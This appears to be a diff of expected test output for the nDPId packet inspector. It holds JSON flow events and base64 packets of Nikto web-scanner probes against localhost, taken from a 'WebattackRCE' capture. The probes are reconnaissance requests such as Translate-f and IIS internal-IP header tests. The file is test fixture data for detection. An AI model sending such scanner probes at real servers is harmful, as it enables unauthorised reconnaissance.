+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276760,"pkt":"AAAAAAAAAAAAAAAACABFAADRGS1AAEAGIvh\/AAABfwAAAcIGH5CUqCEOlTzFf4AYAED+xQAAAQEICp1m+0CdZvtAR0VUIC9qdW5rOTk5LmFzcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk999.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276761,"pkt":"AAAAAAAAAAAAAAAACABFAADQx0dAAEAGdN5\/AAABfwAAAcIIH5Btvf9kj27E6oAYAED+xAAAAQEICp1m+0GdZvtBR0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276761,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
